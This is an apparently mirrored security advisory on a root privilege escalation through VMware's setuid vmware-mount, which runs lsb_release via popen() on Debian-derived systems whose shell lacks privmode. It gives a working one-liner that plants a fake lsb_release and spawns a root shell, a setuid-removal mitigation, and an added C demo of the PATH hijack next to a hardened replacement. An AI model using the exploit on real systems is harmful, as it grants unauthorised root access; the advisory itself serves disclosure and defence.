VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0
Source: vfocus.net  Author: Ormandy  Published: 2016-07-28
On most modern Linux systems, /bin/sh is provided by bash, which detects that it's being invoked as sh, and attempts to mimic traditional sh. As everyone who works in security quickly learns, bash will drop privileges very early if uid != euid.
 
  if (running_setuid && privileged_mode == 0)
    disable_priv_mode ();
 
Where disable_priv_mode is defined as:
 
void
disable_priv_mode ()
{
  setuid (current_user.uid);
  setgid (current_user.gid);
  current_user.euid = current_user.uid;
  current_user.egid = current_user.gid;
}
 
Non-Linux systems tend to use pdksh as /bin/sh, which also supports privmode since version 5.0.5:
 
    /* Turning off -p? */
    if (f == FPRIVILEGED && oldval && !newval) {
#ifdef OS2
        ;
#else /* OS2 */
        setuid(ksheuid = getuid());
        setgid(getgid());
#endif /* OS2 */
    } else if (f == FPOSIX && newval) {
 
 
This is surprisingly effective at mitigating some common vulnerability classes and misconfigurations. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3) calls in setuid executables", see section 7 of the bash NOTES file.
 
However, this privilege drop never happens on Debian-derived systems. Debian (and therefore Ubuntu) uses dash as /bin/sh by default (see https://wiki.debian.org/DashAsBinSh), and dash has no privmode at all; if you choose bash as /bin/sh instead, Debian disables privmode with this patch:
 
http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff
 
A nice example of this failing can be observed in the VMware utilities: the setuid-root vmware-mount binary invokes lsb_release via popen() to learn about the current execution environment. popen() runs the command through /bin/sh -c, so the shell resolves lsb_release through the caller's PATH, and with dash (or privmode-less bash) it does so as root. This means you can get a nice easy root shell like this on any Debian/Ubuntu derived system with VMware installed:
 
$ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
# whoami
root
 
It looks like Debian originally decided they didn't want privmode because it broke UUCP (!?).
 
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586
 
VMware do list Debian/Ubuntu as supported host platforms though, so they have published a fix for this issue today. If you care about this and can't wait for the patch, you can temporarily remove the setuid bit from vmware-mount like this:
 
# chmod u-s /usr/bin/vmware-mount
 
Note that it is almost impossible to use popen() or system() safely in a setuid program without privmode, even if you specify the full path. This is a fun example from back in 2005, but there are lots more cases.
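The two patterns from this advisory side by side, as an added example that is not VMware's code or part of the original post: the popen() call that vmware-mount gets wrong, a harness that reproduces the PATH hijack from the one-liner above in an ordinary (non-setuid) process, and a hardened replacement that skips the shell entirely. The hardened version does by hand what a privmode shell would have done for the program: it drops to the real uid/gid in the child, scrubs the environment, and execve()s the helper by absolute path. The function names, the fake helper script and the scratch directory are all my own constructions.

```c
/* Added example, not from the advisory: popen() in a setuid program vs. a
 * shell-free replacement. The demo is run unprivileged so it is safe to build
 * and execute anywhere. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* The vulnerable pattern: popen() is "/bin/sh -c <cmd>", so the shell finds
 * lsb_release via the caller's PATH. With bash/pdksh privmode the shell would
 * first setuid() back to the real user; with dash it keeps root. */
static int vulnerable_query(const char *cmd, char *out, size_t outlen) {
    FILE *p = popen(cmd, "r");
    if (!p) return -1;
    if (!fgets(out, (int)outlen, p)) out[0] = '\0';
    return pclose(p);
}

/* Reproduces the PATH hijack: plant a fake lsb_release in a scratch dir
 * (constructed for this demo), prepend the dir to PATH, call the vulnerable
 * pattern. Returns 1 if the fake helper ran, 0 if not, -1 on setup error. */
int demo_path_hijack(void) {
    const char *tmp = getenv("TMPDIR") ? getenv("TMPDIR") : "/tmp";
    char dir[4096], fake[4096], newpath[8192], out[128] = {0};
    snprintf(dir, sizeof dir, "%s/privmode-demo-XXXXXX", tmp);
    if (!mkdtemp(dir)) return -1;
    snprintf(fake, sizeof fake, "%s/lsb_release", dir);
    FILE *f = fopen(fake, "w");
    if (!f) { rmdir(dir); return -1; }
    fputs("#!/bin/sh\necho HIJACKED\n", f);     /* stand-in for the one-liner's sh>`tty` */
    fclose(f);
    chmod(fake, 0755);
    const char *cur = getenv("PATH");
    char *oldpath = strdup(cur ? cur : "/usr/bin:/bin");
    snprintf(newpath, sizeof newpath, "%s:%s", dir, oldpath);
    setenv("PATH", newpath, 1);                 /* PATH=.:$PATH from the advisory */
    vulnerable_query("lsb_release -sd", out, sizeof out);
    setenv("PATH", oldpath, 1);
    free(oldpath);
    unlink(fake);
    rmdir(dir);
    return strncmp(out, "HIJACKED", 8) == 0;
}

/* The hardened pattern: no shell. Fork, permanently drop to the real ids in
 * the child (mirroring bash's disable_priv_mode), scrub the environment, and
 * execve() the helper by absolute path, reading its stdout over a pipe.
 * Returns the child's exit status, or -1 on error / non-absolute path. */
int run_helper_unprivileged(const char *abs_path, char *const argv[],
                            char *out, size_t outlen) {
    int fds[2];
    if (!abs_path || abs_path[0] != '/') { errno = EINVAL; return -1; }
    if (pipe(fds) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {
        close(fds[0]);
        if (dup2(fds[1], STDOUT_FILENO) < 0) _exit(127);
        close(fds[1]);
        /* gid before uid, and refuse to continue if either drop fails. For a
         * non-root setuid program prefer setresuid() so the saved uid goes too. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(127);
        if (geteuid() != getuid() || getegid() != getgid()) _exit(127);
        char *const env[] = { "PATH=/usr/bin:/bin", NULL };   /* fixed, trusted env */
        execve(abs_path, argv, env);
        _exit(127);
    }
    close(fds[1]);
    /* Drain everything the child writes so it can never block on a full pipe,
     * keeping only what fits in the caller's buffer. */
    char chunk[256]; size_t n = 0; ssize_t r;
    while ((r = read(fds[0], chunk, sizeof chunk)) > 0) {
        size_t keep = (size_t)r;
        if (n + keep > outlen - 1) keep = outlen - 1 - n;
        memcpy(out + n, chunk, keep);
        n += keep;
    }
    out[n] = '\0';
    close(fds[0]);
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    char out[64] = {0};
    char *const argv[] = { "echo", "privmode", NULL };
    printf("hijack via popen(): %d\n", demo_path_hijack());
    printf("hardened exec status: %d, output: %s",
           run_helper_unprivileged("/bin/echo", argv, out, sizeof out), out);
    return 0;
}
```

Even the hardened form is only as good as the absolute path and the environment it hands the child; the point of the advisory is that a shell in between, without privmode, makes both of those the attacker's to control.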
 
In conclusion, too bad if an otherwise unexploitable bug becomes exploitable, that's the price you pay for high quality uucp support in 2013 ;-)
 
P.S. If you don't know what uucp is, you can read more about it on fidonet or at my gopher site.
P.P.S. I sent the dash maintainers a patch today, but I'm not sure if they're interested.
 